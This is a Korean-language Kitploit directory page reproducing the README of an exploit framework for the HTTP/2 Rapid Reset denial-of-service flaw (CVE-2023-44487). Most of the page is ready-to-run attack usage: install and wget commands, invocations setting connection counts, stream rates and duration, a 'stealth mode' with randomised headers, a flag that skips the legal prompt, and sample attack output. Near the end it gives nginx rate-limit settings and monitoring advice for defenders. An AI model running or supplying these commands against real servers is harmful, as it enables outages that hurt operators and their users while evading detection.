Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit — Advanced CVE-2023-44487 HTTP/2 Rapid Reset vulnerability exploitation framework. Features multi-connection concurrent attacks, adaptive rate control, stealth mode with randomized headers, real-time metrics, and risk assessment reporting. For authorized penetration testing only. By Sudeepa Wanigarathna | Kitploit
도구/GitHubGitHub/cerberusmrxi/cve-2023-44487-http2-dos-rapid-reset-exploit
Exploit FrameworksVulnerability AnalysisExploitationWeb SecurityPenetration TestingRed TeamingAdversarial Attack
GitHubcerberusmrxi/cve-2023-44487-http2-dos-rapid-reset-exploit

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →

소개

Advanced CVE-2023-44487 HTTP/2 Rapid Reset vulnerability exploitation framework. Features multi-connection concurrent attacks, adaptive rate control, stealth mode with randomized headers, real-time metrics, and risk assessment reporting. For authorized penetration testing only. By Sudeepa Wanigarathna

CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit

저장소 보기
120일 전아직 검토되지 않음
공유

CVE-2023-44487 HTTP/2 DoS Rapid Reset 익스플로잇

프로페셔널 에디션 v1.0.1 | 저자: Sudeepa Wanigarathna

Python Version License Version CVSS


목차

  • 개요
  • 취약점 세부 정보
  • 기능
  • 요구 사항
  • 설치
  • 빠른 시작
  • 사용 가이드
  • 구성 옵션
  • Docker 지원
  • 예제
  • 결과 이해
  • 보안 권장 사항
  • 법적 고지
  • 저자
  • 변경 로그

개요

CVE-2023-44487(HTTP/2 Rapid Reset 취약점)을 위한 프로페셔널 등급 평가 프레임워크입니다. 이 도구는 보안 전문가가 최근 몇 년간 공개된 가장 영향력 있는 HTTP/2 DoS 조건 중 하나에 대해 시스템을 테스트하고 검증할 수 있도록 돕습니다.

HTTP/2 스트림을 빠르게 생성하고 재설정하면 서버 리소스를 고갈시켜 서비스 거부(DoS) 상태를 유발할 수 있다는 것을 보여줍니다.

주요 기능 한눈에 보기

  • 다중 연결 공격 엔진 — 동시 HTTP/2 연결
  • 적응형 속도 제어 — 최대 효과를 위한 동적 조정
  • 스텔스 모드 — 무작위 헤더 및 연결 순환
  • 포괄적인 보고 — 위험 평가를 포함한 JSON/CSV
  • Docker 지원 — 컨테이너화된 배포
  • 실시간 모니터링 — 실시간 공격 지표 및 진행 상황
  • 프로페셔널 로깅 — 파일 로깅을 지원하는 컬러 콘솔 출력
사용법결과

취약점 세부 정보

CVE-2023-44487: HTTP/2 Rapid Reset 공격

기술 개요

이 취약점은 HTTP/2 프로토콜의 스트림 관리 메커니즘을 악용합니다:

  1. 스트림 생성 — 클라이언트가 새 스트림을 만들기 위해 HEADERS 프레임을 전송
  2. 즉시 재설정 — 클라이언트가 즉시 RST_STREAM 프레임을 전송
  3. 서버 처리 — 서버는 두 프레임을 모두 처리해야 하므로 리소스 소비
  4. 리소스 고갈 — 반복적인 주기가 서버 리소스를 압도

영향

  • HTTP/2 서버의 리소스 고갈
  • 잠재적 서비스 거부(DoS)
  • 로드 밸런서, 프록시, CDN에 영향을 줄 수 있음
  • 인증이나 특별한 권한이 필요 없음

기능

핵심 기능

고급 기능

  • 프록시 지원 — 확장 가능한 프록시 구성
  • 연결 풀링 — 효율적인 연결 관리
  • 오류 복구 — 연결 실패의 안정적인 처리
  • 성능 튜닝 — 다양한 시나리오를 위한 구성 가능한 설정
  • CI/CD 통합 — 자동화된 보안 테스트에 적합

요구 사항

시스템 요구 사항

종속성

root@kitploit:~
h2>=4.1.0,<5.0.0
aiohttp>=3.8.0,<4.0.0

설치

1. 빠른 설치

root@kitploit:~
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit
cd CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit

# Install dependencies
pip install -r requirements.txt

# Verify installation
python3 cve-2023-44487-exploit.py --help

2. 가상 환경 (권장)

root@kitploit:~
# Create virtual environment
python3 -m venv venv

# Activate virtual environment
# On Linux/macOS:
source venv/bin/activate
# On Windows:
venv\Scripts\activate

# Install dependencies
pip install -r requirements.txt

3. Docker 설치

root@kitploit:~
# Build Docker image
docker build -t cve-2023-44487-exploit .

# Run with Docker
docker run --rm cve-2023-44487-exploit target.com

4. 수동 설치

root@kitploit:~
# Install without requirements.txt
pip install "h2>=4.1.0,<5.0.0" "aiohttp>=3.8.0,<4.0.0"

# Download the exploit
wget https://raw.githubusercontent.com/CerberusMrXi/CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit/main/cve-2023-44487-exploit.py

# Make executable
chmod +x cve-2023-44487-exploit.py

빠른 시작

기본 사용법

root@kitploit:~
# Simple run with default settings
python3 cve-2023-44487-exploit.py example.com

# Test HTTPS on port 443
python3 cve-2023-44487-exploit.py target.com -p 443 --no-verify

# Test HTTP on port 80
python3 cve-2023-44487-exploit.py target.com -p 80 --no-ssl

빠른 테스트 (5초)

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5 --no-verify

전체 평가 (60초)

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com -c 100 -s 2000 -d 60 --stealth --no-verify

사용 가이드

명령줄 옵션

대상 구성

공격 구성

고급 옵션

보고


구성 옵션

위의 CLI 플래그를 사용하여 동시성, 스트림 수, 지속 시간 및 보고를 조정하십시오. 초기 검증에는 낮은 -c / -s / -d 값을 사용하고, 승인된 스트레스 테스트 대상 시스템에서만 규모를 늘리십시오.


Docker 지원

이미지 빌드

root@kitploit:~
docker build -t cve-2023-44487-exploit .

기본 평가 실행

root@kitploit:~
docker run --rm cve-2023-44487-exploit target.com

사용자 지정 매개변수로 실행

root@kitploit:~
docker run --rm cve-2023-44487-exploit target.com -c 100 -s 2000 -d 60

결과를 로컬에 저장

root@kitploit:~
docker run --rm -v "$(pwd)/results:/app/results" \
  cve-2023-44487-exploit target.com -o /app/results/report.json

대화형 모드

root@kitploit:~
docker run --rm -it --entrypoint /bin/bash cve-2023-44487-exploit

Docker Compose

root@kitploit:~
# Start with docker-compose
docker-compose up

# Run with a custom command
docker-compose run --rm exploit target.com -c 100 -s 2000 -d 60

예제

1. 기본 HTTPS 평가

root@kitploit:~
python3 cve-2023-44487-exploit.py api.example.com -p 443 --no-verify -c 50 -s 1000 -d 30

2. HTTP 평가 (SSL 없음)

root@kitploit:~
python3 cve-2023-44487-exploit.py api.example.com -p 80 --no-ssl -c 50 -s 1000 -d 30

3. 고성능 실험실 실행

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com -c 200 -s 5000 -d 120 --target-rps 50000

4. 스텔스 모드

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com --stealth -c 100 -s 2000 -d 60

5. 빠른 검증 테스트

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5 --no-verify

6. CSV 보고서 생성

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com --format csv -o report.csv

7. 검증 건너뛰기

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com --skip-validation -c 50 -s 1000 -d 30

8. 승인된 프로덕션 테스트

root@kitploit:~
python3 cve-2023-44487-exploit.py production.com -p 443 --no-verify \
  -c 100 -s 2000 -d 60 --stealth -o full_report.json

결과 이해

출력 지표

위험 평가 등급

샘플 출력

root@kitploit:~
================================================================================
EXPLOIT EXECUTION SUMMARY
================================================================================
Target: target.com:443
Duration: 30.00s
Total Streams: 15,234
Successful Resets: 15,198
Reset Rate: 506.6/s
Success Rate: 99.76%
Connection Errors: 0
--------------------------------------------------------------------------------
RISK ASSESSMENT
--------------------------------------------------------------------------------
Risk Level: CRITICAL
Risk Score: 95/100
Factors:
  - Extremely high reset rate accepted
  - Very high success rate
================================================================================

보안 권장 사항

시스템 관리자를 위한

즉시 조치

  1. 보안 패치 적용

    • 최신 HTTP/2 구현으로 업데이트
    • 벤더별 보안 패치 적용
    • 로드 밸런서 및 프록시 업데이트
  2. 속도 제한 구현

    root@kitploit:~
    # Nginx rate limiting example
    http {
        limit_req_zone $binary_remote_addr zone=http2:10m rate=10r/s;
        limit_req zone=http2 burst=20 nodelay;
    }
    
  3. 연결 제한

    root@kitploit:~
    # Limit connections per client
    limit_conn_zone $binary_remote_addr zone=conn_zone:10m;
    limit_conn conn_zone 10;
    

구성 강화

설정권장 사항
최대 동시 스트림연결당 100–200으로 설정
스트림 재설정 속도클라이언트당 <100/초로 제한
연결 제한IP당 최대 50–100 연결
시간 초과 값유휴 시간 초과 줄이기

모니터링

root@kitploit:~
# Monitor HTTP/2 connections
netstat -an | grep 443 | grep ESTABLISHED | wc -l

# Monitor reset-related log entries (example)
grep "RST_STREAM" /var/log/nginx/error.log | wc -l

권장 보안 통제

  • 속도 제한 — 클라이언트별 스트림 제한 구현
  • 연결 제한 — IP당 연결 수 제한
  • 리소스 제한 — 연결 시간 초과 값 설정
  • 모니터링 — 이상 징후에 대한 로깅 및 알림 활성화
  • WAF 규칙 — HTTP/2 전용 WAF 규칙 구현
  • 패치 관리 — 정기적인 보안 업데이트
  • 침해 대응 — DoS 공격에 대한 계획 수립

법적 고지

중요: 이 도구를 사용하기 전에 주의 깊게 읽으십시오

이 도구는 승인된 보안 테스트 및 교육 목적으로만 제공됩니다.

사용 약관

이 도구를 사용함으로써 귀하는 다음 사항을 인정하고 동의합니다:

  1. 대상 시스템을 테스트할 수 있는 명시적 서면 허가를 보유하고 있습니다
  2. 이 평가의 위험과 잠재적 영향을 이해합니다
  3. 모든 관련 법률 및 규정을 준수합니다
  4. 귀하의 행동에 대한 전적인 책임을 수락합니다
  5. 이 도구를 승인되지 않은 활동에 사용하지 않습니다

금지된 사용

이 도구는 다음 용도로 사용해서는 안 됩니다:

  • 승인되지 않은 테스트 또는 공격
  • 소유하지 않았거나 테스트 권한이 없는 시스템에 대한 서비스 거부
  • 승인 없이 프로덕션 시스템 중단
  • 금전적 피해 유발
  • 모든 불법 활동

책임 고지

저자와 기여자들은 이 도구를 어떠한 보증도 없이 "있는 그대로" 제공합니다. 이 도구의 사용은 전적으로 사용자 본인의 책임입니다. 저자는 이 도구 사용으로 인해 발생하는 어떠한 손해나 법적 문제에 대해서도 책임을 지지 않습니다.

이 도구의 승인되지 않은 사용은 다음을 포함하되 이에 국한되지 않는 법률을 위반할 수 있습니다:

  • Computer Fraud and Abuse Act (CFAA) — 미국
  • Computer Misuse Act — 영국
  • General Data Protection Regulation (GDPR) — EU
  • 기타 관련 지역, 국가 및 국제법

저자

Sudeepa Wanigarathna

  • 보안 연구원 및 침투 테스터
  • 애플리케이션 보안 및 프로토콜 취약점 전문
  • GitHub
  • LinkedIn

변경 로그

버전 1.0.1 (현재)

  • connection_attempts 속성 오류 수정
  • SSL/ALPN 검증 개선
  • 시간 초과 처리 추가
  • 오류 복구 강화
  • --skip-validation 플래그 추가
  • Docker 지원 개선

버전 1.0.0 (최초)

  • 프로페셔널 에디션 최초 릴리스
  • 다중 연결 공격 엔진
  • 적응형 속도 제어
  • 스텔스 모드
  • 포괄적인 보고
  • Docker 지원

라이선스

이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다 — 자세한 내용은 LICENSE 파일을 참조하십시오.


감사의 말

  • HTTP/2 프로토콜 팀
  • CVE-2023-44487을 식별한 보안 연구원들
  • 오픈 소스 커뮤니티(h2, aiohttp 프로젝트)

참고 자료

  • CVE-2023-44487 NVD 항목
  • HTTP/2 Rapid Reset 공격 분석
  • HTTP/2 프로토콜 사양 (RFC 9113)
  • Nginx HTTP/2 보안 권고
  • Apache HTTP/2 보안 가이드

지원

문제 및 질문은 다음을 통해 문의하십시오:

  • GitHub Issues: 이슈 제출
  • 이메일: [email protected]
  • 보안 연락처: 이 프로젝트에서 취약점을 발견한 경우 책임 있게 신고해 주십시오.

빠른 참조 카드

root@kitploit:~
# Quick Commands

# Test HTTPS (skip cert verify)
python3 cve-2023-44487-exploit.py target.com --no-verify

# Test HTTP
python3 cve-2023-44487-exploit.py target.com -p 80 --no-ssl

# Quick test (5 seconds)
python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5

# Full assessment
python3 cve-2023-44487-exploit.py target.com -c 100 -s 2000 -d 60 --stealth

# Skip validation
python3 cve-2023-44487-exploit.py target.com --skip-validation

# Docker
docker run --rm cve-2023-44487-exploit target.com

# Help
python3 cve-2023-44487-exploit.py --help

알림: 시스템을 테스트하기 전에 항상 적절한 승인을 받으십시오. 이 도구를 책임감 있고 윤리적으로 사용하십시오.


Sudeepa Wanigarathna가 유지 관리 | 마지막 업데이트: 2026년 8월

도구 다운로드
속성값
CVE IDCVE-2023-44487
CVSS 점수7.5 (높음)
공격 벡터네트워크
공격 복잡도낮음
영향서비스 거부(리소스 고갈)
영향받는 프로토콜HTTP/2
공개 날짜2023년 10월
기능설명
HTTP/2 지원h2 라이브러리를 사용한 전체 HTTP/2 프로토콜 구현
다중 연결여러 연결을 통한 동시 공격
SSL/TLS인증서 검증 옵션이 포함된 HTTPS 지원
적응형 속도 제어서버 응답에 따라 공격 속도를 동적으로 조정
스텔스 모드무작위 헤더 및 연결 순환
실시간 모니터링실행 중 실시간 지표 표시
포괄적인 보고위험 평가가 포함된 JSON/CSV 출력
Docker 지원손쉬운 테스트를 위한 컨테이너화된 배포
구성 요소최소권장
OSLinux / macOS / WindowsLinux 또는 macOS
Python3.7+3.11+
CPU2코어4코어 이상
RAM2GB4GB+
네트워크100Mbps1Gbps+
옵션설명기본값
host대상 호스트명 또는 IP필수
-p, --port대상 포트443
--no-sslSSL/TLS 비활성화False
--no-verifySSL 검증 건너뛰기False
옵션설명기본값
-c, --connections동시 연결 수50
-s, --streams연결당 스트림 수1000
-d, --duration지속 시간(초)30
--max-streams최대 총 스트림 수100000
--delay작업 간 기본 지연 시간0.0001s
옵션설명기본값
--adaptive적응형 속도 제어True
--target-rps초당 목표 요청 수10000
--stealth스텔스 모드(무작위 헤더)False
--skip-validation대상 검증 건너뛰기False
--force법적 고지 프롬프트 건너뛰기False
옵션설명기본값
-o, --output출력 파일 이름exploit_results.json
--format출력 형식 (json / csv / console)json
-v, --verbose상세 로깅False
시나리오권장 플래그
스모크 테스트-c 10 -s 100 -d 5
표준 평가-c 50 -s 1000 -d 30
고부하 실험실 테스트-c 100 -s 2000 -d 60 --stealth
신뢰할 수 없는 인증서--no-verify
일반 HTTP-p 80 --no-ssl
지표설명해석
총 스트림생성된 스트림 수높을수록 더 많은 부하 생성
성공적인 재설정성공적으로 재설정된 스트림취약한 대상에서 일반적으로 90% 이상
재설정 속도(RPS)초당 재설정 수높을수록 더 효과적인 부하
성공률성공적인 재설정의 비율90% 초과는 노출 가능성을 의미
연결 오류실패한 연결낮음 = 안정적인 연결
서버 재설정서버가 시작한 재설정높음 = 보호 조치 존재
등급점수의미
CRITICAL80–100서버가 매우 취약함
HIGH60–79서버가 취약하나 일부 보호 조치 있음
MEDIUM40–59일부 보호 조치가 있음
LOW0–39보호가 잘 되어 있는 서버
요청 크기 제한헤더 크기 및 페이로드 제한